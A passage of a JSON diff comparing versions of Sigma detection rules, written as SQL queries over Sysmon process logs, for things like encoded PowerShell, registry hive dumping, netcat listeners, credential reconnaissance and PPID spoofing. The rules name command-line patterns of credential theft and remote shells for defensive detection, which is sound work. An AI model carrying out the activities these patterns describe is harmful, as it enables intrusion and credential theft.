encoded commands that often appear in malware infection chains", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Other tools that work with encoded scripts in the command line instead of script files" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%apphelp.dll%' ESCAPE '\\' AND (CommandLine LIKE '%ShimFlushCache%' ESCAPE '\\' OR CommandLine LIKE '%#250%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%kernel32.dll%' ESCAPE '\\' AND (CommandLine LIKE '%BaseFlushAppcompatCache%' ESCAPE '\\' OR CommandLine LIKE '%#46%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\') AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% PAA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\')) AND NOT (((ParentImage LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_rundll32_susp_shimcache_flush.yml" + "filename": "proc_creation_win_powershell_encoded_cmd_patterns.yml" }, { - "title": "Renamed Vmnat.exe Execution", - "id": "7b4f794b-590a-4ad4-ba18-7964a2832205", + "title": "DLL Loaded via CertOC.EXE", + "id": "242301bc-f92f-4476-8718-78004a6efd9f", "status": "experimental", - "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", - "author": "elhoim", + "description": "Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.", + "author": "Austin Songer @austinsonger", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'vmnat.exe' AND NOT ((Image LIKE '%vmnat.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_vmnat.yml" + "filename": "proc_creation_win_certoc_load_dll.yml" }, { - "title": "Dumping of Sensitive Hives Via Reg.EXE", - "id": "fd877b94-9bb5-4191-bb25-d79cbd93c167", - "status": "test", - "description": "Detects the usage of \"reg.exe\" in order to dump sensitive registry hives, which includes SAM, SYSTEM and SECURITY", - "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113", + "title": "Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE", + "id": "07f8bdc2-c9b3-472a-9817-5a670b872f53", + "status": "experimental", + "description": "Detects usage of cmdkey to look for cached credentials on the system", + "author": "jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "car.2013-07-001" + "attack.t1003.005" ], "falsepositives": [ - "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" + "Legitimate administrative tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%save%' ESCAPE '\\' OR CommandLine LIKE '%export%' ESCAPE '\\' OR CommandLine LIKE '%ˢave%' ESCAPE '\\' OR CommandLine LIKE '%eˣport%' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hk˪m%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪ocal\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_loca˪\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪oca˪\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢystem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\syˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢyˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢecurity%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /l%' ESCAPE '\\' OR CommandLine LIKE '% -l%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_dumping_sensitive_hives.yml" + "filename": "proc_creation_win_cmdkey_recon.yml" }, { - "title": "Lazarus System Binary Masquerading", - "id": "3f7f5b0b-5b16-476c-a85f-ab477f6dd24b", - "status": "test", - "description": "Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location", - "author": "Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)", + "title": "Suspicious GrpConv Execution", + "id": "f14e169e-9978-4c69-acb3-1cff8200bc36", + "status": "experimental", + "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdtc.exe' ESCAPE '\\' OR Image LIKE '%\\\\gpsvc.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%grpconv.exe -o%' ESCAPE '\\' OR CommandLine LIKE '%grpconv -o%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_lazarus_binary_masquerading.yml" + "filename": "proc_creation_win_lolbin_susp_grpconv.yml" }, { - "title": "HackTool - Bloodhound/Sharphound Execution", - "id": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", - "status": "test", - "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", - "attack.execution", - "attack.t1059.001" - ], + "title": "Execution of Powershell Script in Public Folder", + "id": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", + "status": "experimental", + "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", + "author": "Max Altgelt (Nextron Systems)", "falsepositives": [ - "Other programs that use these command line option and accepts an 'All' parameter" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Product LIKE '%SharpHound%' ESCAPE '\\' OR Description LIKE '%SharpHound%' ESCAPE '\\' OR (Company LIKE '%SpecterOps%' ESCAPE '\\' OR Company LIKE '%evil corp%' ESCAPE '\\') OR (Image LIKE '%\\\\Bloodhound.exe%' ESCAPE '\\' OR Image LIKE '%\\\\SharpHound.exe%' ESCAPE '\\')) OR (CommandLine LIKE '% -CollectionMethod All %' ESCAPE '\\' OR CommandLine LIKE '% --CollectionMethods Session %' ESCAPE '\\' OR CommandLine LIKE '% --Loop --Loopduration %' ESCAPE '\\' OR CommandLine LIKE '% --PortScanTimeout %' ESCAPE '\\' OR CommandLine LIKE '%.exe -c All -d %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Bloodhound%' ESCAPE '\\' OR CommandLine LIKE '%Get-BloodHoundData%' ESCAPE '\\') OR (CommandLine LIKE '% -JsonFolder %' ESCAPE '\\' AND CommandLine LIKE '% -ZipFileName %' ESCAPE '\\') OR (CommandLine LIKE '% DCOnly %' ESCAPE '\\' AND CommandLine LIKE '% --NoSaveCache %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%-f C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fi C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fil C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-file C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \\%Public\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_bloodhound_sharphound.yml" + "filename": "proc_creation_win_powershell_public_folder.yml" }, { - "title": "PUA - Netcat Suspicious Execution", - "id": "e31033fc-33f0-4020-9a16-faf9b31cbf08", + "title": "DLL Sideloading by Microsoft Defender", + "id": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", "status": "experimental", - "description": "Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", - "author": "frack113, Florian Roth (Nextron Systems)", + "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ - "attack.command_and_control", - "attack.t1095" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate ncat use" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\nc.exe' ESCAPE '\\' OR Image LIKE '%\\\\ncat.exe' ESCAPE '\\' OR Image LIKE '%\\\\netcat.exe' ESCAPE '\\') OR (CommandLine LIKE '% -lvp %' ESCAPE '\\' OR CommandLine LIKE '% -lvnp%' ESCAPE '\\' OR CommandLine LIKE '% -l -v -p %' ESCAPE '\\' OR CommandLine LIKE '% -lv -p %' ESCAPE '\\' OR CommandLine LIKE '% -l --proxy-type http %' ESCAPE '\\' OR CommandLine LIKE '% -vnl --exec %' ESCAPE '\\' OR CommandLine LIKE '% -vnl -e %' ESCAPE '\\' OR CommandLine LIKE '% --lua-exec %' ESCAPE '\\' OR CommandLine LIKE '% --sh-exec %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MpCmdRun.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_netcat.yml" + "filename": "proc_creation_win_mpcmdrun_dll_sideload_defender.yml" }, { - "title": "New User Created Via Net.EXE With Never Expire Option", - "id": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", + "title": "HackTool - PPID Spoofing SelectMyParent Tool Execution", + "id": "52ff7941-8211-46f9-84f8-9903efb7077d", "status": "test", - "description": "Detects creation of local users via the net.exe command with the option \"never expire\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion", + "attack.t1134.004" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%expires:never%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SelectMyParent.exe' ESCAPE '\\' OR (CommandLine LIKE '%PPID-spoof%' ESCAPE '\\' OR CommandLine LIKE '%ppid\\_spoof%' ESCAPE '\\' OR CommandLine LIKE '%spoof-ppid%' ESCAPE '\\' OR CommandLine LIKE '%spoof\\_ppid%' ESCAPE '\\' OR CommandLine LIKE '%ppidspoof%' ESCAPE '\\' OR CommandLine LIKE '%spoofppid%' ESCAPE '\\' OR CommandLine LIKE '%spoofedppid%' ESCAPE '\\' OR CommandLine LIKE '% -spawnto %' ESCAPE '\\') OR (OriginalFileName LIKE '%PPID-spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%ppid\\_spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof-ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof\\_ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%ppidspoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofedppid%' ESCAPE '\\') OR Description = 'SelectMyParent' OR Imphash IN ('04d974875bd225f00902b4cad9af3fbc', 'a782af154c9e743ddf3f3eb2b8f3d16e', '89059503d7fbf470e68f7e63313da3ad', 'ca28337632625c8281ab8a130b3d6bad') OR (Hashes LIKE '%IMPHASH=04D974875BD225F00902B4CAD9AF3FBC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89059503D7FBF470E68F7E63313DA3AD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CA28337632625C8281AB8A130B3D6BAD%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_net_user_add_never_expire.yml" + "filename": "proc_creation_win_hktl_selectmyparent.yml" }, { - "title": "Suspicious Execution of InstallUtil To Download", - "id": "75edd216-1939-4c73-8d61-7f3a0d85b5cc", - "status": "experimental", - "description": "Detects the use the .NET InstallUtil.exe application in order to download arbitrary files. The files will be written to %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE\\", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Renamed SysInternals DebugView Execution", + "id": "cd764533-2e07-40d6-a718-cfeec7f2da7f", + "status": "test", + "description": "Detects suspicious renamed SysInternals DebugView execution", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR OriginalFileName = 'InstallUtil.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Product = 'Sysinternals DebugView' AND NOT (OriginalFileName = 'Dbgview.exe' AND Image LIKE '%\\\\Dbgview.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_installutil_download.yml" + "filename": "proc_creation_win_renamed_sysinternals_debugview.yml" }, { - "title": "Suspicious Diantz Alternate Data Stream Execution", - "id": "6b369ced-4b1d-48f1-b427-fdc0de0790bd", + "title": "Potential Manage-bde.wsf Abuse To Proxy Execution", + "id": "c363385c-f75d-4753-a108-c1a8e28bdbda", "status": "test", - "description": "Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.", - "author": "frack113", + "description": "Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution", + "author": "oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1216" ], "falsepositives": [ - "Very Possible" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%diantz.exe%' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND CommandLine REGEXP ':[^\\\\]')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR OriginalFileName = 'wscript.exe') AND CommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') OR (((ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\cmd.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_diantz_ads.yml" + "filename": "proc_creation_win_lolbin_manage_bde.yml" }, { - "title": "Suspicious Key Manager Access", - "id": "a4694263-59a8-4608-a3a0-6f8d3a51664c", + "title": "Potential PowerShell Execution Policy Tampering - ProcCreation", + "id": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", "status": "experimental", - "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555.004" + "attack.defense_evasion" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%keymgr%' ESCAPE '\\' AND CommandLine LIKE '%KRShowKeyMgr%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy%' ESCAPE '\\') AND (CommandLine LIKE '%Bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\' OR CommandLine LIKE '%Unrestricted%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_keymgr.yml" + "filename": "proc_creation_win_registry_set_unsecure_powershell_policy.yml" }, { - "title": "Remote Code Execute via Winrm.vbs", - "id": "9df0dd3a-1a5c-47e3-a2bc-30ed177646a0", - "status": "test", - "description": "Detects an attempt to execute code or create service on remote host via winrm.vbs.", - "author": "Julia Fomina, oscd.community", + "title": "Wscript Shell Run In CommandLine", + "id": "2c28c248-7f50-417a-9186-a85b223010ee", + "status": "experimental", + "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Rare legitimate inline scripting by some administrators" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR OriginalFileName = 'cscript.exe') AND (CommandLine LIKE '%winrm%' ESCAPE '\\' AND CommandLine LIKE '%invoke Create wmicimv2/Win32\\_%' ESCAPE '\\' AND CommandLine LIKE '%-r:http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Wscript.%' ESCAPE '\\' AND CommandLine LIKE '%.Shell%' ESCAPE '\\' AND CommandLine LIKE '%.Run%' ESCAPE '\\')" ], - "filename": "proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml" + "filename": "proc_creation_win_script_wscript_shell_cli.yml" }, { - "title": "Potential Binary Impersonating Sysinternals Tools", - "id": "7cce6fc8-a07f-4d84-a53e-96e1879843c9", + "title": "Pubprn.vbs Proxy Execution", + "id": "1fb76ab8-fa60-4b01-bddd-71e89bf555da", "status": "experimental", - "description": "Detects binaries that use the same name as legitimate sysinternals tools to evade detection", + "description": "Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.", "author": "frack113", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.t1216.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR Image LIKE '%\\\\accesschk64.exe' ESCAPE '\\' OR Image LIKE '%\\\\AccessEnum.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADInsight.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADInsight64.exe' ESCAPE '\\' OR Image LIKE '%\\\\adrestore.exe' ESCAPE '\\' OR Image LIKE '%\\\\adrestore64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Autologon.exe' ESCAPE '\\' OR Image LIKE '%\\\\Autologon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Autoruns.exe' ESCAPE '\\' OR Image LIKE '%\\\\Autoruns64.exe' ESCAPE '\\' OR Image LIKE '%\\\\autorunsc.exe' ESCAPE '\\' OR Image LIKE '%\\\\autorunsc64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Bginfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\Bginfo64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Cacheset.exe' ESCAPE '\\' OR Image LIKE '%\\\\Cacheset64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Clockres.exe' ESCAPE '\\' OR Image LIKE '%\\\\Clockres64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Contig.exe' ESCAPE '\\' OR Image LIKE '%\\\\Contig64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Coreinfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\Coreinfo64.exe' ESCAPE '\\' OR Image LIKE '%\\\\CPUSTRES.EXE' ESCAPE '\\' OR Image LIKE '%\\\\CPUSTRES64.EXE' ESCAPE '\\' OR Image LIKE '%\\\\ctrl2cap.exe' ESCAPE '\\' OR Image LIKE '%\\\\Dbgview.exe' ESCAPE '\\' OR Image LIKE '%\\\\dbgview64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktops.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktops64.exe' ESCAPE '\\' OR Image LIKE '%\\\\disk2vhd.exe' ESCAPE '\\' OR Image LIKE '%\\\\disk2vhd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\diskext.exe' ESCAPE '\\' OR Image LIKE '%\\\\diskext64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Diskmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\Diskmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\DiskView.exe' ESCAPE '\\' OR Image LIKE '%\\\\DiskView64.exe' ESCAPE '\\' OR Image LIKE '%\\\\du.exe' ESCAPE '\\' OR Image LIKE '%\\\\du64.exe' ESCAPE '\\' OR Image LIKE '%\\\\efsdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\FindLinks.exe' ESCAPE '\\' OR Image LIKE '%\\\\FindLinks64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\hex2dec.exe' ESCAPE '\\' OR Image LIKE '%\\\\hex2dec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\junction.exe' ESCAPE '\\' OR Image LIKE '%\\\\junction64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ldmdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\listdlls.exe' ESCAPE '\\' OR Image LIKE '%\\\\listdlls64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\loadOrd.exe' ESCAPE '\\' OR Image LIKE '%\\\\loadOrd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\loadOrdC.exe' ESCAPE '\\' OR Image LIKE '%\\\\loadOrdC64.exe' ESCAPE '\\' OR Image LIKE '%\\\\logonsessions.exe' ESCAPE '\\' OR Image LIKE '%\\\\logonsessions64.exe' ESCAPE '\\' OR Image LIKE '%\\\\movefile.exe' ESCAPE '\\' OR Image LIKE '%\\\\movefile64.exe' ESCAPE '\\' OR Image LIKE '%\\\\notmyfault.exe' ESCAPE '\\' OR Image LIKE '%\\\\notmyfault64.exe' ESCAPE '\\' OR Image LIKE '%\\\\notmyfaultc.exe' ESCAPE '\\' OR Image LIKE '%\\\\notmyfaultc64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntfsinfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntfsinfo64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pendmoves.exe' ESCAPE '\\' OR Image LIKE '%\\\\pendmoves64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pipelist.exe' ESCAPE '\\' OR Image LIKE '%\\\\pipelist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\portmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Procmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\Procmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\psExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psfile.exe' ESCAPE '\\' OR Image LIKE '%\\\\psfile64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psGetsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\psGetsid64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psInfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\psInfo64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pskill.exe' ESCAPE '\\' OR Image LIKE '%\\\\pskill64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pslist.exe' ESCAPE '\\' OR Image LIKE '%\\\\pslist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psLoggedon.exe' ESCAPE '\\' OR Image LIKE '%\\\\psLoggedon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE 